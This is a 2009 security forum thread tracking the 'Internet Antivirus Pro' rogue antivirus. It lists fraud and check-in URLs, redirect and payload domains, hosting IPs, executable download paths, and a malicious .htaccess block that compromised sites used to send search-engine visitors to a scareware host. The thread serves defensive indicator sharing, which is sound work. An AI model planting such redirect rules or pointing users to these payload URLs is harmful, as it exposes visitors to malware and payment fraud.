Author Topic: Internet Antivirus Pro Sites  (Read 7735 times)

0 Members and 1 Guest are viewing this topic.

August 21, 2009, 08:15:14 pm
Read 7735 times

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
Payment/fraud site:
http://digitalbillnow.com/?pid=IAPRO3

Internet Antivirus Pro check-in post:
inb4sq.com/reports/install-report.php

Called the hosting provider up for the check-in IP because it hosted a TON of domains. He immediately suspended it (which was nice). None of these should work anymore and should hopefully stay gone - 204.27.57.227:

http://www.malwaredomainlist.com/mdl.php?search=204.27.57.227&colsearch=All&quantity=50
http://www.malwareurl.com/search.php?domain=&s=204.27.57.227&match=0&rp=500



September 05, 2009, 03:05:39 pm
Reply #1

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
seems to be moved to this IP: 91.212.107.103

http://www.malwareurl.com/search.php?domain=&s=InternetAntivirusPro&match=0&rp=50&urls=on&redirs=on&ip=on&reverse=on&as=on

some redirects - change 3-4 times a day

Code: [Select]
goeachscan.com
gokeepscan.com
gocodescan.com
goaddscan.com
goparkscan.com
goscansnap.com
golikescan.com
golikescan.com
gotechscan.com
goscantech.com
gotubespot.com

payload:
Code: [Select]
ina4ik.com/download/file.exe
ina4ik.com/download/InternetAntivirusPro.exe

InternetAntivirusPro family:

spelem.info   91.212.107.103   2009-09-05 
goeachscan.com   91.212.107.103   2009-09-05 
apalet.info   91.212.107.103   2009-09-05 
erpeer.info   91.212.107.103   2009-09-05 
froday.info   91.212.107.103   2009-09-05 
grumio.info   91.212.107.103   2009-09-05 
polear.info   91.212.107.103   2009-09-05 
sallat.info   91.212.107.103   2009-09-05 
searce.info   91.212.107.103   2009-09-05 
slatch.info   91.212.107.103   2009-09-05 
tenshy.info   91.212.107.103   2009-09-05 
towton.info   91.212.107.103   2009-09-05 
unroot.info   91.212.107.103   2009-09-05 
vagrom.info   91.212.107.103   2009-09-05 
voided.info   91.212.107.103   2009-09-05 
upwize.info   94.102.63.212   2009-09-04 
dictor.info   94.102.63.212   2009-09-04 
diffus.info   94.102.63.212   2009-09-04 
cality.info   94.102.63.212   2009-09-04 
ina4ct.com   94.102.63.212   2009-09-04 
ina4ik.com   94.102.63.212   2009-09-04 
ina4ik.com   94.102.63.212    2009-09-04 
alectr.info   94.102.63.212   2009-09-04 
bedash.info   91.212.107.103   2009-09-03 
scourg.info   94.102.63.212   2009-09-03 
lapsek.info   94.102.63.212   2009-09-03 
numben.info   91.212.107.103   2009-09-02 
onclew.info   91.212.107.103   2009-09-02 
sallut.info   91.212.107.103   2009-09-02 
tented.info   91.212.107.103   2009-09-02 
faites.info   91.212.107.103   2009-09-02 
droope.info   91.212.107.103   2009-09-02 
haere.info   91.212.107.103   2009-09-02 
anprun.info   91.212.107.103   2009-09-01 
ungain.info   94.102.63.212   2009-09-01 
fosset.info   91.212.107.103   2009-09-01 
knivel.info   91.212.107.103   2009-08-31 
orodes.info   91.212.107.103   2009-08-31 
gokeepscan.com   91.212.107.103   2009-08-31 
gocodescan.com   91.212.107.103   2009-08-31 
goaddscan.com   91.212.107.103   2009-08-31 
fulier.info                91.212.107.103   2009-08-31 
adjudg.info   91.212.107.103   2009-08-31 
atwain.info   91.212.107.103   2009-08-31 
caretz.info   91.212.107.103   2009-08-31 
gaudad.info   91.212.107.103   2009-08-31 
krapen.info   91.212.107.103   2009-08-31 
nevils.info   91.212.107.103   2009-08-31 
outliv.info   91.212.107.103   2009-08-31 
penvie.info   91.212.107.103   2009-08-31 
stampo.info   91.212.107.103   2009-08-31 
ticedu.info   91.212.107.103   2009-08-31 
unwept.info   91.212.107.103   2009-08-31 
gelded.info   91.212.107.103   2009-08-31 
dolchi.info   91.212.107.103   2009-08-31 
figgle.info   91.212.107.103   2009-08-31 
botled.info   91.212.107.103   2009-08-31 
sighal.info   91.212.107.103   2009-08-30 
argier.info   91.212.107.103   2009-08-30 
hownet.info   91.212.107.103   2009-08-30 
leavet.info   94.102.63.212   2009-08-30 
scarre.info   91.212.107.103   2009-08-30 
steepy.info   91.212.107.103   2009-08-30 
inquir.info   91.212.107.103   2009-08-29 
pittie.info                91.212.107.103   2009-08-29 
ireful.info                208.80.152.2   2009-08-29 
copien.info   94.102.63.212   2009-08-29 
plamet.info   91.212.107.103   2009-08-28 
usicam.info   91.212.107.103   2009-08-28 
swoons.info   91.212.107.103   2009-08-28 
fifthz.info    91.212.107.103   2009-08-28 
broths.info   91.212.107.103   2009-08-28 
robera.info   67.212.71.196   2009-08-28 
kedder.info   91.212.107.103   2009-08-28 
speen.info   91.212.107.103   2009-08-28 
anmast.info   91.212.107.103   2009-08-28 
zussia.info   91.212.107.103   2009-08-28 
prarie.info   91.212.107.103   2009-08-27 
unclin.info   91.212.107.103   2009-08-27 
miloty.info   91.212.107.103   2009-08-27 
cuplift.info   91.212.107.103   2009-08-26 
wiving.info   91.212.107.103   2009-08-26 
camlet.info   91.212.107.103   2009-08-26 
debuty.info   91.212.107.103   2009-08-26 
devicel.info   91.212.107.103   2009-08-26 
extrip.info   91.212.107.103   2009-08-26 
filths.info    91.212.107.103   2009-08-26 
holdit.info   91.212.107.103   2009-08-26 
potinz.info   91.212.107.103   2009-08-26 
quoifs.info   91.212.107.103   2009-08-26 
raught.info   91.212.107.103   2009-08-26 
reglet.info   91.212.107.103   2009-08-26 
undeaf.info   91.212.107.103   2009-08-26 
narowz.info   91.212.107.103   2009-08-25 
scrowl.info   91.212.107.103   2009-08-25 
amamon.info   84.16.235.187   2009-08-25 
freckl.info   91.212.107.103   2009-08-24 
sawme.info   91.212.107.103   2009-08-24 
declin.info   91.212.107.103   2009-08-23 
fatted.info   91.212.107.103   2009-08-23 
inclin.info                91.212.107.103   2009-08-21 
unowed.info   91.212.107.103   2009-08-21 
cressy.info   84.16.235.187   2009-08-21 
suffic.info   204.27.57.227   2009-08-21 
hopest.info   204.27.57.227   2009-08-21 
fatuus.info   204.27.57.227   2009-08-20 
burier.info   204.27.57.227   2009-08-20 
sibble.info   204.27.57.227   2009-08-19 
nnight.info   91.212.107.103   2009-08-19 
longed.info   204.27.57.227   2009-08-19 
briers.info   204.27.57.227   2009-08-18 
jennyfy.info   84.16.235.187   2009-08-18 
meyrie.info   91.212.107.103   2009-08-18 
pleach.info   204.27.57.227   2009-08-18 
pickknob.info   204.27.57.227   2009-08-18 
goparkscan.com   204.27.57.227   2009-08-18 
goscansnap.com   204.27.57.227   2009-08-18 
golikescan.com   204.27.57.227   2009-08-18 
gotechscan.com   204.27.57.227   2009-08-18 
goscantech.com   91.212.107.103   2009-08-18 
gotubespot.com   204.27.57.227   2009-08-18 
espied.info   204.27.57.227   2009-08-18 
envied.info   204.27.57.227   2009-08-18 
stonek.info   204.27.57.227   2009-08-18 
captum.info   204.27.57.227   2009-08-18 
enlarg.info   204.27.57.227   2009-08-18 
inb4ch.com   204.27.57.227   2009-08-18 
sicyon.info   204.27.57.227   2009-08-17 
expuls.info   204.27.57.227   2009-08-16 
unlook.info   204.27.57.227   2009-08-16 
ursley.info   204.27.57.227   2009-08-15 
plantof.info   84.16.235.187   2009-08-15 
loacher.info   67.212.71.196   2009-08-15 
unvelir.info   67.212.71.196   2009-08-15 
mixsoul.info   67.212.71.196   2009-08-15 
sleave.info   67.212.71.196   2009-08-15 
addjest.info   38.105.19.27   2009-08-15 
daobrains.info   38.105.19.27   2009-08-15 
neatsore.info   38.105.19.27   2009-08-15 
oplanet.info   38.105.19.27   2009-08-15 
ventsol.info   38.105.19.27   2009-08-15 
pattle.info   204.27.57.227   2009-08-15 
pridge.info   204.27.57.227   2009-08-14 
beeves.info   91.212.107.103   2009-08-14 
inb4it.com   204.27.57.227   2009-08-14 
farced.info   204.27.57.227   2009-08-13 
fauste.info   204.27.57.227   2009-08-13 
curtle.info   204.27.57.227   2009-08-13 
cowish.info   204.27.57.227   2009-08-12 
curtal.info   204.27.57.227   2009-08-12 
extirp.info   204.27.57.227   2009-08-11 
unmast.info   204.27.57.227   2009-08-11 
budger.info   204.27.57.227   2009-08-10 
antick.info   204.27.57.227   2009-08-10 
crazel.info   204.27.57.227   2009-08-09 
kahold.info   204.27.57.227   2009-08-09 
erworn.info   204.27.57.227   2009-08-08 
niobes.info   204.27.57.227   2009-08-07 
enteri.info   204.27.57.227   2009-08-07 

October 03, 2009, 10:18:24 am
Reply #2

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL
internetantiviruspro:

redirects:
Code: [Select]
goscancode.com
downloader:
Code: [Select]
guiany.info/download/install.php
emnity.info/download/install.php
scanatom6.com/download/install.php

http://www.malwaredomainlist.com/mdl.php?inactive=on&sort=Date&search=goscan&colsearch=All&ascordesc=DESC&quantity=500&page=0
http://www.malwaredomainlist.com/mdl.php?search=scan4&colsearch=All&quantity=500&inactive=on
http://www.malwaredomainlist.com/mdl.php?search=scan6&colsearch=All&quantity=500&inactive=on

payload location:

Code: [Select]
inb4iv.com/download/vista/GeneralAntivirus.exe
inb4iv.com/download/vista/file.exe
inb4iv.com/download/xp/GeneralAntivirus.exe
inb4iv.com/download/xp/file.exe
inb4iv.com/download/install.exe
inb4iv.com/download/internetantiviruspro.exe
inb4iv.com/download/oaNEJ4wQ0S.exe
inb4iv.com/download/pinch_youtubehof.net_de.exe
inb4iv.com/download/sf9Zx1SDiB.exe
inb4iv.com/download/InternetAntivirusPro2.exe
inb4iv.com/download/file.exe
inb4iv.com/download/file2.exe
inb4iv.com/download/file3.exe
inb4iv.com/download/file4.exe
inb4iv.com/download/IAInstall.exe
inb4iv.com/download/IAInstall2.exe
inb4iv.com/download/IAInstall3.exe
inb4iv.com/download/IAInstall4.exe
inb4iv.com/download/IAUninstaller.exe
inb4iv.com/download/InternetAntivirusPro.exe.aw.exe
inb4iv.com/download/InternetAntivirusPro.exe
inb4iv.com/download/InternetAntivirusPro.exe.new.exe
inb4iv.com/download/InternetAntivirusPro.exe.old.exe
inb4iv.com/download/InternetAntivirusPro.exe.was

Code: [Select]
in5iv.com/download/IAInstall.exe
in5iv.com/download/IAInstall2.exe
in5iv.com/download/IAInstall3.exe
in5iv.com/download/IAInstall4.exe
in5iv.com/download/IAUninstaller.exe
in5iv.com/download/InternetAntivirusPro.exe
in5iv.com/download/InternetAntivirusPro.exe.aw.exe
in5iv.com/download/InternetAntivirusPro.exe.new.exe
in5iv.com/download/InternetAntivirusPro.exe.old.exe
in5iv.com/download/InternetAntivirusPro.exe.was
in5iv.com/download/InternetAntivirusPro2.exe
in5iv.com/download/file.exe
in5iv.com/download/file2.exe
in5iv.com/download/file3.exe
in5iv.com/download/file4.exe
in5iv.com/download/install.exe
in5iv.com/download/internetantiviruspro.exe
in5iv.com/download/oaNEJ4wQ0S.exe
in5iv.com/download/pinch_youtubehof.net_de.exe
in5iv.com/download/sf9Zx1SDiB.exe
in5iv.com/download/vista/GeneralAntivirus.exe
in5iv.com/download/vista/file.exe
in5iv.com/download/xp/GeneralAntivirus.exe
in5iv.com/download/xp/file.exe


October 17, 2009, 03:54:39 pm
Reply #4

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL

payload:

Code: [Select]
inb6it.com/download/vista/GeneralAntivirus.exe
inb6it.com/download/vista/file.exe
inb6it.com/download/xp/GeneralAntivirus.exe
inb6it.com/download/xp/file.exe
inb6it.com/download/install.exe
inb6it.com/download/internetantiviruspro.exe
inb6it.com/download/oaNEJ4wQ0S.exe
inb6it.com/download/pinch_youtubehof.net_de.exe
inb6it.com/download/sf9Zx1SDiB.exe
inb6it.com/download/InternetAntivirusPro2.exe
inb6it.com/download/file.exe
inb6it.com/download/file2.exe
inb6it.com/download/file3.exe
inb6it.com/download/file4.exe
inb6it.com/download/IAInstall.exe
inb6it.com/download/IAInstall2.exe
inb6it.com/download/IAInstall3.exe
inb6it.com/download/IAInstall4.exe
inb6it.com/download/IAUninstaller.exe
inb6it.com/download/InternetAntivirusPro.exe.aw.exe
inb6it.com/download/InternetAntivirusPro.exe.new.exe
inb6it.com/download/InternetAntivirusPro.exe.old.exe
inb6it.com/download/InternetAntivirusPro.exe.was

redirects:

Code: [Select]
godirscan.com
goeasescan.com
gonamescan.com
goscanadd.com
goscandir.com
goscandoer.com
goscanease.com
goscankeep.com
goscanlike.com
goscanmute.com
goscanneat.com
goscanpick.com
goscansole.com
goscantrio.com
goscanxtra.com
gosolescan.com
godoerscan.com
gopickscan.com

domain used:

Code: [Select]
girded.info
spinge.info
pante.info
obsque.info
veldun.info
pasio.info
cheir.info
lavolt.info
besort.info
freiny.info
suivez.info
guiany.info
pretia.info
exampl.info
lowatt.info
meanly.info
surnam.info
nroof.info
orifex.info
volsce.info
topful.info
engirt.info
bedaub.info
ignomy.info
implor.info
birnam.info
pplay.info
strawy.info
fliht.info
squach.info
dislik.info
xonker.info
qward.info
sigeia.info
octian.info
deferr.info
afront.info
vipren.info
almain.info
empery.info
bagse.info
girded.info
spinge.info
pante.info
obsque.info
veldun.info
pasio.info
cheir.info
lavolt.info
besort.info
freiny.info
suivez.info


October 19, 2009, 07:56:52 pm
Reply #6

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
http://marketcoms.cn?pid=71&sid=f3b6e0
http://applestore2.cn/?pid=71&sid=f3b6e0

redirecting to your-pc-protection2.com

October 20, 2009, 03:59:21 pm
Reply #7

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
We have been seeing quite a few google searches redirect to mg1b.info. However, if you go to the sites directly, it does not redirect you. Looks like a ton of people got owned and had their .htaccess files overwritten to something like this:

Code: [Select]
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://mg1b.info/go2.php?s=x301 [R,L]

Looks like it has been going on for quite a while though I guess there is a resurgance in this technique for pushing Internet Antivirus Pro:
http://blog.unmaskparasites.com/2008/12/08/unmasking-the-antivirus-2009-htaccess-exploit/

October 20, 2009, 09:45:53 pm
Reply #8

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
And yet more that I keep coming to for this same one today:

computer-protection-7.com

November 06, 2009, 09:50:38 am
Reply #9

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL

redirects:

Code: [Select]
godeckscan.com
gohandscan.com
goherdscan.com
gorestscan.com
gosakescan.com
goscandeck.com
goscanhand.com
goscanherd.com
goscanrest.com
goscansake.com
goscantown.com
gotownscan.com
gowellscan.com
golookscan.com

rogue downloader

payload: /download/IAInstall.exe

Code: [Select]
ducyqan.cn
dovzyag.cn
duzebyn.cn
dozabes.cn
dybapi.cn
epuneyv.cn
epuvyiz.cn

online but not working:
Code: [Select]
cafgouh.cn
cecyde.cn
eboezu.cn
byzivte.cn
etyupy.cn
etywuq.cn
ebejar.cn
ebiuhas.cn
byxzeq.cn
cecxoyk.cn
ebogumi.cn
bysivak.cn
ebeama.cn
etuexyp.cn
ebureky.cn
etuacwo.cn
etyaha.cn
etuyzal.cn
etupet.cn
cakdoz.cn
cakevy.cn
cakuqe.cn
camjyel.cn
rousen.info
esuteyb.cn
eceiqak.cn
ecezofu.cn
etobez.cn
ecibuaj.cn
etoubal.cn
esyofo.cn
eticod.cn
etexyaj.cn
esyviq.cn
esyeziw.cn
ecoaly.cn
eteyxuz.cn
ereuwzo.cn
ecoydo.cn
ecyarzo.cn
eriolyh.cn
erixune.cn
dyshir.cn
dytrevu.cn
erauso.cn
ebaetu.cn
ereuqba.cn
dyzani.cn
etyawjo.cn
kireja.cn
kirgune.cn
dymsem.cn
kizxyun.cn
dyqunre.cn
eruqav.cn
kixyhce.cn
erujale.cn
dyqkuam.cn
kiwraux.cn
dyrajko.cn
dyrmilu.cn
eroisyw.cn
komsehi.cn
kopeka.cn
komxaiv.cn
eroyjgi.cn
dybaqhi.cn
dybulhe.cn
komvyl.cn
dyfpilu.cn
dyckeqi.cn
dycotda.cn
kohkiv.cn
kohsuby.cn
dyjurwe.cn
eryase.cn
eruqief.cn
dyjzeti.cn
etykauw.cn
dykazif.cn
dykqupo.cn
erywiza.cn
ewaevuf.cn
kocwiyg.cn
ewalepi.cn
ceduszi.cn
kocepal.cn
erypuin.cn
erygibo.cn
erymezo.cn
kogiteq.cn
kogivet.cn
esaowy.cn
cekrin.cn
ecyigud.cn
celwahy.cn
cepamwi.cn
ecygaf.cn
cekfaq.cn
evykoas.cn
ewaevqu.cn
ceqywis.cn
evuxyv.cn
evybine.cn
evouga.cn
edamym.cn
cafropy.cn
eviyzru.cn
cerdiko.cn
edivuka.cn
ediyfzu.cn
ecyujo.cn
edociv.cn
cepula.cn
cifebi.cn
evyazi.cn
cerwyk.cn
kipuxo.cn
dovnaji.cn
kirdabe.cn
edoqeg.cn
cigzaon.cn
kijxayt.cn
edoeqnu.cn
dotqyuw.cn
kiluxso.cn

other rogue on the same IP:

Code: [Select]
g-antivirus.com
general-av.com
generalavs.com